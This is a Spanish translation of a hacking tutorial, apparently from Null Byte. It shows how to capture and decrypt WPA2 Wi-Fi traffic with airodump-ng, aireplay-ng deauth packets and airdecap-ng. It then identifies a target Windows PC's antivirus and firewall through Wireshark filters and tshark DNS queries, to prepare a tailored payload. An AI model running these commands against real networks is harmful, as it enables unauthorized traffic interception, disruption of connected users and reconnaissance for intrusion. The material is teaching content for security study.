Artículo publicado en: https://null-byte.wonderhowto.com/how-to/hacking-windows-10-identify-antivirus-software-installed-windows-pc-0198775/
Determinar el software antivirus y cortafuegos instalado en una computadora con Windows es crucial para que un atacante se prepare para crear un stager o carga útil específica. Con la inspección encubierta de paquetes profundos, esa información se identifica fácilmente.
Este ataque supone que la contraseña de Wi-Fi para la red de destino ya se conoce . Con la contraseña, un atacante puede observar los datos que atraviesan la red y enumerar el software de seguridad instalado. Las soluciones populares de antivirus y firewall se pueden identificar fácilmente cuando se filtra el tráfico web benigno.
Aprenderemos cómo capturar y descifrar el tráfico de Wi-Fi sin autenticar el enrutador de destino, y realizaremos una inspección de paquetes para descubrir los tipos de aplicaciones de seguridad de terceros instaladas en el sistema operativo.
- No se pierda: intercepte las contraseñas de Windows en una red local
Paso 1. Capture el tráfico de Wi-Fi
Para comenzar en Kali, use el comando airmon-ng para detener todos los procesos que se ejecutan en segundo plano y que pueden interferir con la tarjeta inalámbrica.
~# airmon-ng check kill
Killing these processes:
PID Name
2891 wpa_supplicant
Habilite el modo de monitor en el adaptador Alfa (u otro adaptador inalámbrico ) con el comando airmon-ng start wlan0 .
~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy2 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon)
(mac80211 station mode vif disabled for [phy2]wlan0)
Luego, realice una exploración inicial de airodump-ng para enumerar las redes Wi-Fi en el área circundante.
~# airodump-ng wlan0mon
CH 6 ][ Elapsed: 36 s ][ 2020-04-06 20:45
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -19 13 6 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
Cuando se haya identificado el enrutador, presione Control-C para detener el escaneo. Realice una captura de paquetes dirigida contra el enrutador Wi-Fi incluyendo las opciones –channel , –write , –bssid y –essid .
~# airodump-ng --channel 11 --write /root/Desktop/capture --bssid "00:20:91:B4:F8:33" --essid "NullByte_Network" wlan0mon
CH 9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -20 100 8308 1895 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
Aireply-ng des autenticará los dispositivos conectados al enrutador. Este comando es necesario para capturar los datos del protocolo de enlace WPA2. Los paquetes capturados solo se pueden descifrar con un protocolo de enlace válido.
Abra una nueva terminal y use el siguiente comando aireplay-ng para enviar tres paquetes «deauth» al enrutador, forzando a los usuarios autenticados a reconectarse.
~# aireplay-ng -0 3 -a 00:20:91:B4:F8:33 -e "NullByte_Network" wlan0mon
05:12:46 Waiting for beacon frame (BSSID: 00:20:91:B4:F8:33) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
05:12:46 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:46 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:47 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
Un ataque exitoso producirá la notificación «WPA handshake» en la esquina superior derecha de la terminal airodump-ng .
CH 9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ][ WPA handshake: 00:20:91:B4:F8:33 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -20 100 8308 1895 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
En este punto, la ventana airodump-ng debería continuar capturando paquetes durante el mayor tiempo posible (es decir, muchas horas). A medida que pasa el tiempo, el software de seguridad en la computadora con Windows 10 objetivo intentará actualizar periódicamente la aplicación y las bases de datos de definición de virus. Estas consultas web son valiosas para un hacker con acceso a la red que se prepara para montar un ataque dirigido.
Paso 2. Descifrar el PCAP
Airdecap-ng es una herramienta de descifrado de captura de paquetes y parte de la suite Aircrack-ng.
~# airdecap-ng -b "00:20:91:B4:F8:33" -e "NullByte_Network" -p "WIFI_PASSWORD_HERE" /root/Desktop/capture-01.cap
Total number of stations seen 8
Total number of packets read 32310
Total number of WEP data packets 0
Total number of WPA data packets 4555
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 3435
Number of bad TKIP (WPA) packets 0
Number of bad CCMP (WPA) packets 0
Airdecap-ng usará el ESSID de Wi-Fi (-e) y la contraseña (-p) para descifrar y filtrar los paquetes que pertenecen a la red. En el ejemplo anterior, podemos ver 3435 paquetes descifrados WPA. Airdecap-ng creará un archivo llamado «capture-01-dec.cap» en el directorio actual.
Después de descifrar el PCAP, importe el nuevo archivo capture-01-dec.cap a Wireshark .
Paso 3. Busque el software antivirus (Avast)
Avast es una de las soluciones de software antivirales más populares del mundo.
Los dominios conocidos de Avast incluyen avast.com y avcdn.net, su red principal de distribución de contenido (CDN). Diariamente, estos dominios se utilizan para obtener bases de datos de virus y actualizaciones de software, así como enviar información de telemetría. Estos dominios se pueden filtrar en Wireshark con el siguiente filtro de visualización.
ip.host ~ "(?i)(avast|avcdn)\.*"
Se pueden agregar muchos dominios antivirus al filtro y separarlos mediante barras verticales (|).
Los resultados anteriores son una fuerte indicación de que la computadora está utilizando el software antivirus Avast. Los datos se pueden inspeccionar más a fondo para identificar las cadenas de agente de usuario comúnmente utilizadas por este proveedor de antivirus.
http.user_agent ~ "(?i)avast*"
Esta secuencia HTTP particular invocó una solicitud POST y entregó algunos datos sin cifrar a un servidor Avast. Como podemos ver, la solicitud se originó en la computadora con Windows 10 con un agente de usuario de Avast.
El cuerpo de la secuencia HTTP contiene algunos datos no cifrados relacionados con el dispositivo de destino. El tipo de CPU, el nombre de host de Windows 10 y la arquitectura de la placa base, así como la versión de Avast y los ajustes de configuración, se pueden descubrir desde una sola secuencia HTTP.
POST /cgi-bin/iavs4stats.cgi HTTP/1.1
Host: v7.stats.avast.com
User-Agent: avast! Antivirus (instup)
Accept: */*
Content-MD5:
Content-Type: iavs4/stats
Content-Length:
GCHBitmap=0
GChBrand=AVFC
GTBBitmap=0
GTBBrand=
InstupVersion=19.5.4444.0
IsVirtual=1
NoRegistration=0
OfferEvent=0
OfferResult=2
SZB=0
ScAsAvastReg=1
ScAsAvastStatus=off
ScAsOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAsOtherReg=2
ScAsOtherStatus=on,off,
ScAvAvastReg=1
ScAvAvastStatus=off
ScAvOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAvOtherReg=2
ScAvOtherStatus=on,off,
ScFwAvastReg=0
ScFwAvastStatus=
ScFwOtherList=Windows Firewall,
ScFwOtherReg=1
ScFwOtherStatus=on,
ShepherdConfigName=Avast-Windows-AV-Consumer_email-signatures_antitrack-production_production-new-installs_version-18.6-and-higher_driver-updater-production_v19.3-and-higher_v18.7-and-higher_v2017_test-datasharing-consent_test-antitrack-text-b_free_test-upsell-screens_smartscan-last-screen_new-recomendo_production_version-17.9-and-higher_avast-19-r5_smartscan-free---antivirus_v18.3-and-higher_alpha-new-installs_mybackend-on_test-pam-no-master-password_v18.5-and-higher_chrome-installed-by-avast_cleanup-premium-installation
UpdatingTime=0
WEI_Cpu=8.4
WEI_D3D=9.9
WEI_Disk=7.3
WEI_Graphics=2.4
WEI_Memory=5.5
WEI_SystemRating=2.4
boot_time_scan_accepted=0
boot_time_scan_offered=0
brandCode=AVFC
bytes=199216597
bytesOK=199216597
community=1
cookie=mmm_ava_tst_004_762_b
cpu_name=Intel(R) Core(TM) i7-7700 CPU @ 2.80GHz,4
custom_scan_created=0
edition=1
gsMainStatus=0
gsNoticeNotifs=0
gsUrgentNotifs=0
gsWarningNotifs=0
gui_opened=4
gui_settings_altered=0
gui_settings_opened=0
guid=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
help_opened=0
idate_w=1508774395
lan_addr=tokyoneon-PC
lan_ip=192.168.1.152
lang=0409
licAlpha=1
licExpDays=30
licExpirationDate=1562974590
licFeature=5f0231d7-4c46-4855-8199-5d0cb185d427
licIssuedDate=1560382590
licSchemaId=avast-free-1s1m_1s1m
licType=Trial
licType2=4
offerInstReturn=0
offerReasons=0
offerType=1
on_demand_scan_invoked=0
operation=3
os=win,10,0,2,16299,0,AMD64
part.program=2378,2378,0,0
part.setup=2378,2378,0,0
part.vps=419828228,419828228,0,0
passive_mode=0
product=ais
ram_mb=4990
repo_id=iavs9x
serial=0
silent=0
status=00000000
statver=2.20
tspan=454
tspanOK=454
version=19.5.2378
statsSendTime=1260399041
Estos datos son muy valiosos para un atacante en la red, ya que les permite crear una carga específica para ese usuario y sistema operativo.
Además de Wireshark, tshark y grep pueden imprimir y filtrar fácilmente las solicitudes de DNS, respectivamente, en la salida estándar. Agregue sort -u al comando para mostrar solo dominios únicos (es decir, sin duplicados).
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | grep -i "avast\|avcdn" | sort -u
b1477563.iavs9x.u.avast.com
b4380882.iavs9x.u.avast.com
b4380882.vps18.u.avcdn.net
d3336443.vps18.u.avcdn.net
f3355109.iavs9x.u.avast.com
filerep.ff.avast.com
g0679661.iavs9x.u.avast.com
g0679661.vps18.u.avcdn.net
g5041154.vps18.u.avcdn.net
h1745978.iavs9x.u.avast.com
h6891735.vps18.u.avcdn.net
k8528219.iavs9x.u.avast.com
k9290131.iavs9x.u.avast.com
m5972635.vps18.u.avcdn.net
p3357684.vps18.u.avcdn.net
r4907515.vps18.u.avcdn.net
s-iavs9x.avcdn.net
s-vps18.avcdn.net
t7758057.vps18.u.avcdn.net
v6831430.vps18.u.avcdn.net
v7event.stats.avast.com
v7.stats.avast.com
Paso 4. Búsqueda de software de firewall (Comodo)
Comodo Firewall es una solución de firewall popular diseñada para monitorear el tráfico entrante y saliente para identificar amenazas y prevenir ataques.
Su configuración del servidor DNS hace que sea difícil para los atacantes de la red a las aplicaciones instaladas enumerar y los sitios web visitados. Aún así, el software de Comodo ocasionalmente verificará si hay actualizaciones de software que le brinden al atacante toda la información que necesitan.
ip.host ~ "(?i)(comodo)\.*"
Para ver los dominios consultados en la salida estándar, examine el PCAP con tshark y filtre las solicitudes de DNS.
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name
Es probable que este comando produzca una salida grande que contenga miles de dominios, direcciones IP y entradas duplicadas. Agregue los comandos sort y uniq para contar los servidores más consultados.
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | sort | uniq -c
2 218.0.101.95.in-addr.arpa
72 22.70.154.156.in-addr.arpa
14 22.71.154.156.in-addr.arpa
1 download.comodo.com
1 ncc.avast.com
1 su.ff.avast.com
2 v10.vortex-win.data.microsoft.com
1 wireshark.org
Observe que la dirección 22.70.154.156.in-addr.arpa aparece 72 veces en el PCAP. Una búsqueda rápida y búsqueda de IP sugiere que 156.154.70.22 ha sido un servidor DNS de Comodo durante muchos años. Si bien esto no significa definitivamente que el objetivo tenga instalado el software Comodo, sugeriría que son conscientes de la seguridad.
Pensamientos finales…
Este artículo cubre solo unos pocos filtros de pantalla Wireshark . Hay muchos filtros HTTP , IP y DNS que ayudarían a un pirata informático mientras recopila información sobre el objetivo.
Con una lista completa de software antivirus popular , un atacante generalmente podrá decir con certeza si una máquina Windows objetivo tiene instalado un software de seguridad. Lo que da más miedo es que la enumeración de software se logra sin conectarse a la red Wi-Fi o sin necesidad de acceso físico a la computadora.
Latest posts by Jose Miguel (see all)
- Artículo: Guía completa de seguridad en el uso de redes Wi-Fi en entornos empresariales y públicos. - 23 septiembre, 2024
- Artículo: Cómo reaccionar ante un ataque de Phishing: Guía para Usuarios Empresariales - 20 septiembre, 2024
- Artículo: Guía básica para la gestión de contraseñas y usuarios en navegadores populares. - 20 septiembre, 2024
- Artículo: La importancia de las copias de seguridad en la ámbito empresarial: Guía Práctica. - 18 septiembre, 2024
- Artículo: Mejorando la ciberseguridad en el entorno laboral: Guía práctica para Empleados. - 16 septiembre, 2024